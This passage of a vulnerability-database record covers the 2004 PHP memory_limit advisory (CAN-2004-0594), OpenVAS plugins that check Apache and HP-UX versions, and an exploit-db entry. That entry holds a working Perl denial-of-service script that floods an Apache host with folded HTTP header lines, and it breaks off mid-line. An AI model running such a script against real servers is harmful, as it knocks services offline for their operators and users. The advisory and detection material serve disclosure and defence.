memory_limit\r\n Risk: Critical\r\nVendor Status: Vendor has released a bugfixed version.\r\n Reference: http://security.e-matters.de/advisories/112004.html\r\n\r\n\r\nOverview:\r\n\r\n PHP is a widely-used general-purpose scripting language that is \r\n especially suited for Web development and can be embedded into HTML.\r\n\r\n According to Security Space PHP is the most popular Apache module\r\n and is installed on about 50% of all Apaches worldwide. This figure\r\n includes of course only those servers that are not configured with\r\n expose_php=Off.\r\n \r\n During a reaudit of the memory_limit problematic it was discovered \r\n that it is possible for a remote attacker to trigger the memory_limit\r\n request termination in places where an interruption is unsafe. This\r\n can be abused to execute arbitrary code on remote PHP servers.\r\n \r\n \r\nDetails:\r\n \r\n On the 28th June 2004 Gregori Guninski released his advisory about\r\n a possible remote DOS vulnerability within Apache 2 (CAN-2004-0493).\r\n This vulnerability allows tricking Apache 2 into acception arbitrary\r\n sized HTTP headers. Guninski and many others rated this bug as "Low\r\n Risk" for 32bit systems, but they did not take into account that \r\n such a bug could have a huge impact on 3rd party modules.\r\n \r\n After his advisory was released I reaudited PHP's memory_limit \r\n request termination, because this bug made it possible to reach the \r\n memory_limit at places that were never meant to be interrupted. \r\n After a possible exploitation path for Apache 2 servers was \r\n discovered and a working exploit was created, similar pathes were \r\n found and added to the proof of concept exploit that allowed\r\n exploitation of NON Apache 2 servers. (f.e. Apache 1.3.31)\r\n \r\n The idea of the exploit is simple. When PHP allocates a block of\r\n memory it first checks in the cache of free memory blocks for a block\r\n of the same size. If such a block is found it is taken from the cache\r\n otherwise PHP checks if an allocation would violate the memory_limit.\r\n In that case the request shutdown is triggered through zend_error(). \r\n (PHP < 4.3.7 aborts after the violating memory block is allocated)\r\n PHP contains several places where such an interruption is unsafe.\r\n An example for such places are those where Zend HashTables are \r\n allocated and initialised. This is performed in 2 steps and the\r\n initialisation step itself allocates memory before important members\r\n are correctly initialised. An attacker that is able to trigger the\r\n memory_limit abort within zend_hash_init() and is additionally able\r\n to control the heap before the HashTable itself is allocated, is \r\n able to supply his own HashTable destructor pointer.\r\n \r\n Several places within PHP where found where this action is performed\r\n on HashTables that actually get destructed by the request shutdown.\r\n One of such places is f.e. within the fileupload code, but is only \r\n triggerable on Apache 2 servers that are vulnerable to CAN-2004-0493, \r\n another one is only reachable if variables_order was changed to have \r\n the "E" in the end, a third one is within session extension which is \r\n activated by default but the vulnerability can not be triggered if\r\n the session functionality is not used. A fourth place is within the\r\n implementation of the register_globals functionality. Although this\r\n is deactivated by default since PHP 4.2 it is activated on nearly\r\n all servers that have to ensure compatibility with older scripts.\r\n Other places might exist in not default activated or 3rd party\r\n extensions.\r\n \r\n All mentioned places outside of the extensions are quite easy to\r\n exploit, because the memory allocation up to those places is \r\n deterministic and quite static throughout different PHP versions.\r\n The only unknown entity is the size of the environment vars array.\r\n But that is usually small and can be bruteforced with some kind\r\n of binary search algorithm. Additionally this information could\r\n leak to an attacker through an open phpinfo() page. If the admin\r\n used php.ini-recommended as configuration basis it is irrelevant\r\n anyway because the ENV array is not populated in that case.\r\n \r\n Because the exploit itself consist of supplying an arbitrary \r\n destructor pointer this bug is exploitable on any platform.\r\n (Except the system runs with non exec heap+stack protection)\r\n This includes systems running Hardened-PHP <= 0.1.2 because they\r\n have no protection of the HashTable destructor pointer.\r\n \r\n As a last word it should be said, that an attacker does not need\r\n to send 8/16/64MB (or whatever the memory_limit is) per attack.\r\n With POST requests it is quite easy to eat 100 (and more) times \r\n the amount of sent bytes.\r\n\r\n\r\nProof of Concept:\r\n\r\n e-matters is not going to release an exploit for this vulnerability\r\n to the public.\r\n \r\n\r\nDisclosure Timeline:\r\n\r\n 07. July 2004 - Vendor-sec was informed about the fact that this\r\n vulnerability was found\r\n 14. July 2004 - Public Disclosure\r\n\r\n\r\nCVE Information:\r\n\r\n The Common Vulnerabilities and Exposures project (cve.mitre.org) has\r\n assigned the name CAN-2004-0594 to this issue.\r\n\r\n \r\nRecommendation:\r\n\r\n If you are running PHP with compiled in memory_limit support, it is\r\n strongly recommended that you upgrade as soon as possible to the \r\n newest version. Disabling memory_limit within your configuration can\r\n be considered a workaround, but leaves your site vulnerable to \r\n memory hungry PHP scripts or POST requests that create huge variables.\r\n If you are running PHP with Apache <= 2.0.49 ensure that you have the\r\n fix for CAN-2004-0493 applied.\r\n \r\n \r\nGPG-Key:\r\n\r\n http://security.e-matters.de/gpg_key.asc\r\n \r\n pub 1024D/3004C4BC 2004-05-17 e-matters GmbH - Securityteam \r\n Key fingerprint = 3FFB 7C86 7BE8 6981 D1DA A71A 6F7D 572D 3004 C4BC\r\n\r\n\r\nCopyright 2004 Stefan Esser. All rights reserved.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.0.6 (GNU/Linux)\r\nComment: For info see http://www.gnupg.org\r\n\r\niD8DBQFA9Icab31XLTAExLwRAuvFAKCzOMXUnIaj0CkCW0GxXg08YErusACgmU8z\r\n5d1swwTrHOVQLKmruY+pea0=\r\n=H98x\r\n-----END PGP SIGNATURE-----\r\n\r\n_______________________________________________\r\nFull-Disclosure - We believe in it.\r\nCharter: http://lists.netsys.com/full-disclosure-charter.html", "edition": 1, "reporter": "Securityvulns", "published": "2004-07-14T00:00:00", "title": "[Full-Disclosure] Advisory 11/2004: PHP memory_limit remote vulnerability", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:10", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2004-0493", "CVE-2004-0594"], "modified": "2004-07-14T00:00:00", "id": "SECURITYVULNS:DOC:6484", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:6484", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}], "openvas": [{"lastseen": "2018-09-01T23:35:56", "references": ["7269"], "pluginID": "136141256231012293", "description": "The remote host appears to be running a version of Apache 2.x which is\n older than 2.0.50.", "edition": 3, "reporter": "This script is Copyright (C) 2004 David Maciejak", "published": "2005-11-03T00:00:00", "title": "Apache Input Header Folding and mod_ssl ssl_io_filter_cleanup DoS Vulnerabilities", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Denial of Service", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0493"], "modified": "2018-03-28T00:00:00", "id": "OPENVAS:136141256231012293", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231012293", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: apache_input_header_folding_dos.nasl 9228 2018-03-28 06:22:51Z cfischer $\n#\n# Apache Input Header Folding and mod_ssl ssl_io_filter_cleanup DoS Vulnerabilities\n#\n# Authors:\n# David Maciejak <david dot maciejak at kyxar dot fr>\n# based on work from (C) Tenable Network Security\n#\n# Copyright:\n# Copyright (C) 2004 David Maciejak\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\n#ref: Georgi Guninski (June 2004)\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.12293\");\n script_version(\"$Revision: 9228 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-03-28 08:22:51 +0200 (Wed, 28 Mar 2018) $\");\n script_tag(name:\"creation_date\", value:\"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)\");\n script_bugtraq_id(10619, 12877);\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:P\");\n script_cve_id(\"CVE-2004-0493\");\n script_xref(name:\"OSVDB\", value:\"7269\");\n script_name(\"Apache Input Header Folding and mod_ssl ssl_io_filter_cleanup DoS Vulnerabilities\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"This script is Copyright (C) 2004 David Maciejak\");\n script_family(\"Denial of Service\");\n script_dependencies(\"secpod_apache_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"apache/installed\");\n\n tag_summary = \"The remote host appears to be running a version of Apache 2.x which is\n older than 2.0.50.\";\n\n tag_insight = \"There is denial of service in apache httpd 2.0.x by sending a\n specially crafted HTTP request. It is possible to consume arbitrary\n amount of memory. On 64 bit systems with more than 4GB virtual memory\n this may lead to heap based buffer overflow. See also\n http://www.guninski.com/httpd1.html\n\n There is also a denial of service vulnerability in mod_ssl's\n ssl_io_filter_cleanup function. By sending a request to vulnerable\n server over SSL and closing the connection before the server can send\n a response, an attacker can cause a memory violation that crashes the\n server.\";\n\n tag_solution = \"Upgrade to Apache/2.0.50 or newer\";\n\n script_tag(name:\"summary\", value:tag_summary);\n script_tag(name:\"insight\", value:tag_insight);\n script_tag(name:\"solution\", value:tag_solution);\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\n\nport = get_http_port( default:80 );\nbanner = get_http_banner( port:port );\nif( ! banner ) exit( 0 );\n\nif( egrep( pattern:\"^Server:.*Apache(-AdvancedExtranetServer)?/2\\.0\\.(([0-9][^0-9])([0-3][0-9][^0-9])|(4[0-9][^0-9])).*\", string:banner ) ) {\n security_message( port:port );\n exit( 0 );\n}\n\nexit( 99 );", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:49:57", "references": [], "pluginID": "54610", "description": "The remote host is missing updates announced in\nadvisory GLSA 200407-03.", "edition": 2, "reporter": "Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com", "published": "2008-09-24T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "title": "Gentoo Security Advisory GLSA 200407-03 (Apache)", "type": "openvas", "naslFamily": "Gentoo Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0493"], "modified": "2017-07-07T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=54610", "id": "OPENVAS:54610", "sourceData": "# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A bug in Apache may allow a remote attacker to perform a Denial of Service\nattack. With certain configurations this could lead to a heap based buffer\noverflow.\";\ntag_solution = \"Apache 2 users should upgrade to the latest version of Apache:\n\n # emerge sync\n\n # emerge -pv '>=net-www/apache-2.0.49-r4'\n # emerge '>=net-www/apache-2.0.49-r4'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200407-03\nhttp://bugs.gentoo.org/show_bug.cgi?id=55441\nhttp://www.guninski.com/httpd1.html\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200407-03.\";\n\n \n\nif(description)\n{\n script_id(54610);\n script_version(\"$Revision: 6596 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:21:37 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-24 21:14:03 +0200 (Wed, 24 Sep 2008)\");\n script_bugtraq_id(10619);\n script_cve_id(\"CVE-2004-0493\");\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:P\");\n script_name(\"Gentoo Security Advisory GLSA 200407-03 (Apache)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"net-www/apache\", unaffected: make_list(\"ge 2.0.49-r4\", \"lt 2\"), vulnerable: make_list(\"le 2.0.49-r3\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-12-08T11:44:09", "references": ["7269"], "pluginID": "12293", "description": "The remote host appears to be running a version of Apache 2.x which is\nolder than 2.0.50. \n\nThere is denial of service in apache httpd 2.0.x by sending a\nspecially crafted HTTP request. It is possible to consume arbitrary\namount of memory. On 64 bit systems with more than 4GB virtual memory\nthis may lead to heap based buffer overflow. See also\nhttp://www.guninski.com/httpd1.html\n\nThere is also a denial of service vulnerability in mod_ssl's\nssl_io_filter_cleanup function. By sending a request to vulnerable\nserver over SSL and closing the connection before the server can send\na response, an attacker can cause a memory violation that crashes the\nserver.", "edition": 2, "reporter": "This script is Copyright (C) 2004 David Maciejak", "published": "2005-11-03T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "title": "Apache Input Header Folding and mod_ssl ssl_io_filter_cleanup DoS Vulnerabilities", "type": "openvas", "naslFamily": "Denial of Service", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0493"], "modified": "2017-12-07T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=12293", "id": "OPENVAS:12293", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: apache_input_header_folding_dos.nasl 8023 2017-12-07 08:36:26Z teissa $\n# Description: Apache Input Header Folding and mod_ssl ssl_io_filter_cleanup DoS Vulnerabilities\n#\n# Authors:\n# David Maciejak <david dot maciejak at kyxar dot fr>\n# based on work from (C) Tenable Network Security\n#\n# Copyright:\n# Copyright (C) 2004 David Maciejak\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ntag_summary = \"The remote host appears to be running a version of Apache 2.x which is\nolder than 2.0.50. \n\nThere is denial of service in apache httpd 2.0.x by sending a\nspecially crafted HTTP request. It is possible to consume arbitrary\namount of memory. On 64 bit systems with more than 4GB virtual memory\nthis may lead to heap based buffer overflow. See also\nhttp://www.guninski.com/httpd1.html\n\nThere is also a denial of service vulnerability in mod_ssl's\nssl_io_filter_cleanup function. By sending a request to vulnerable\nserver over SSL and closing the connection before the server can send\na response, an attacker can cause a memory violation that crashes the\nserver.\";\n\ntag_solution = \"Upgrade to Apache/2.0.50 or newer\";\n\n#ref: Georgi Guninski (June 2004)\n\nif(description)\n{\n script_id(12293);\n script_version(\"$Revision: 8023 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-07 09:36:26 +0100 (Thu, 07 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)\");\n script_bugtraq_id(10619, 12877);\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:P\");\n script_cve_id(\"CVE-2004-0493\");\n script_xref(name:\"OSVDB\", value:\"7269\");\n \n name = \"Apache Input Header Folding and mod_ssl ssl_io_filter_cleanup DoS Vulnerabilities\";\n\n script_name(name);\n \n\n \n \n script_category(ACT_GATHER_INFO);\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n \n \n script_copyright(\"This script is Copyright (C) 2004 David Maciejak\");\n family = \"Denial of Service\";\n script_family(family);\n script_dependencies(\"find_service.nasl\", \"http_version.nasl\");\n script_require_keys(\"www/apache\");\n script_require_ports(\"Services/www\", 80);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\n#\n# The script code starts here\n#\ninclude(\"http_func.inc\");\n\nport = get_http_port(default:80);\n\nif(get_port_state(port))\n{\nbanner = get_http_banner(port: port);\nif(!banner)exit(0);\n \nif(egrep(pattern:\"^Server:.*Apache(-AdvancedExtranetServer)?/2\\.0\\.(([0-9][^0-9])([0-3][0-9][^0-9])|(4[0-9][^0-9])).*\", string:banner))\n {\n security_message(port);\n }\n}\n", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-04-09T11:40:13", "references": ["http://www11.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c00915716-1", "01064"], "pluginID": "1361412562310835148", "description": "Check for the Version of Apache", "edition": 2, "reporter": "Copyright (C) 2009 Greenbone Networks GmbH", "published": "2009-05-05T00:00:00", "title": "HP-UX Update for Apache HPSBUX01064", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "HP-UX Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0493", "CVE-2004-0595", "CVE-2004-0488", "CVE-2004-0594"], "modified": "2018-04-06T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310835148", "id": "OPENVAS:1361412562310835148", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# HP-UX Update for Apache HPSBUX01064\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_impact = \"Remote execution of arbitrary code\n Denial of Service (DoS)\";\ntag_affected = \"Apache on\n HP-UX B.11.00, B.11.11, B.11.22, and B.11.23 running the hpuxwsAPACHE HP-UX \n Apache-based Web Server.\";\ntag_insight = \"A potential security vulnerability has been identified with HP-UX running \n Apache. The vulnerability could be exploited remotely to allow execution of \n arbitrary code or to create a Denial of Service (DoS).\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://www11.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c00915716-1\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.835148\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-05-05 12:14:23 +0200 (Tue, 05 May 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"HPSBUX\", value: \"01064\");\n script_cve_id(\"CVE-2004-0493\", \"CVE-2004-0488\", \"CVE-2004-0594\", \"CVE-2004-0595\");\n script_name( \"HP-UX Update for Apache HPSBUX01064\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of Apache\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"HP-UX Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/hp_hp-ux\", \"ssh/login/release\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-hpux.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"HPUX11.00\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE\", revision:\"A.2.0.50.00\", rls:\"HPUX11.00\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.11\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE\", revision:\"A.2.0.50.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE\", revision:\"B.2.0.50.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.23\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE\", revision:\"B.2.0.50.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:56:40", "references": ["http://www11.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c00915716-1", "01064"], "pluginID": "835148", "description": "Check for the Version of Apache", "edition": 2, "reporter": "Copyright (C) 2009 Greenbone Networks GmbH", "published": "2009-05-05T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "title": "HP-UX Update for Apache HPSBUX01064", "type": "openvas", "naslFamily": "HP-UX Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0493", "CVE-2004-0595", "CVE-2004-0488", "CVE-2004-0594"], "modified": "2017-07-06T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=835148", "id": "OPENVAS:835148", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# HP-UX Update for Apache HPSBUX01064\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_impact = \"Remote execution of arbitrary code\n Denial of Service (DoS)\";\ntag_affected = \"Apache on\n HP-UX B.11.00, B.11.11, B.11.22, and B.11.23 running the hpuxwsAPACHE HP-UX \n Apache-based Web Server.\";\ntag_insight = \"A potential security vulnerability has been identified with HP-UX running \n Apache. The vulnerability could be exploited remotely to allow execution of \n arbitrary code or to create a Denial of Service (DoS).\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://www11.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c00915716-1\");\n script_id(835148);\n script_version(\"$Revision: 6584 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-06 16:13:23 +0200 (Thu, 06 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-05-05 12:14:23 +0200 (Tue, 05 May 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"HPSBUX\", value: \"01064\");\n script_cve_id(\"CVE-2004-0493\", \"CVE-2004-0488\", \"CVE-2004-0594\", \"CVE-2004-0595\");\n script_name( \"HP-UX Update for Apache HPSBUX01064\");\n\n script_summary(\"Check for the Version of Apache\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"HP-UX Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/hp_hp-ux\", \"ssh/login/release\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-hpux.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"HPUX11.00\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE\", revision:\"A.2.0.50.00\", rls:\"HPUX11.00\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.11\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE\", revision:\"A.2.0.50.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE\", revision:\"B.2.0.50.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.23\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE\", revision:\"B.2.0.50.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-01-31T12:14:38", "osvdbidlist": ["7269"], "references": [], "description": "Apache HTTPd Arbitrary Long HTTP Headers DoS. CVE-2004-0493. Dos exploits for multiple platform", "edition": 1, "reporter": "bkbll", "published": "2004-07-22T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "exploitdb", "title": "Apache HTTPd Arbitrary Long HTTP Headers DoS", "bulletinFamily": "exploit", "cvelist": ["CVE-2004-0493"], "modified": "2004-07-22T00:00:00", "id": "EDB-ID:360", "href": "https://www.exploit-db.com/exploits/360/", "sourceData": "#/usr/bin/perl\r\n#\r\n#exploit for apache ap_get_mime_headers_core() vuln\r\n#\r\n#adv is here: http://www.guninski.com/httpd1.html\r\n#\r\n#version: apache 2 <2.0.49 apache 1 not tested.\r\n#\r\n#by bkbll bkbll#cnhonker.net http://www.cnhonker.com\r\n#\r\n#tail -f /var/log/messages\r\n#Jul 1 17:43:16 www kernel: Out of Memory: Killed process 658 (httpd)\r\n#\r\n\r\nuse IO::Socket::INET;\r\n\r\n$host=\"10.10.10.114\";\r\n$port=80;\r\n$sock = IO::Socket::INET->new(PeerAddr => $host,PeerPort => $port, Proto => 'tcp') || die \"new error$@\\n\";\r\nbinmode($sock);\r\n$hostname=\"Host: $host\";\r\n$buf2='A'x50;\r\n$buf4='A'x8183;\r\n$len=length($buf2);\r\n$buf=\"GET / HTTP/1.1\\r\\n\";\r\nsend($sock,$buf,0) || die \"send error:$@\\n\";\r\nfor($i= 0; $i < 2000000; $i++)\r\n{\r\n $buf=\" $buf4\\r\\n\";\r\n send($sock,$buf,0) || die \"send error:$@, target maybe have been 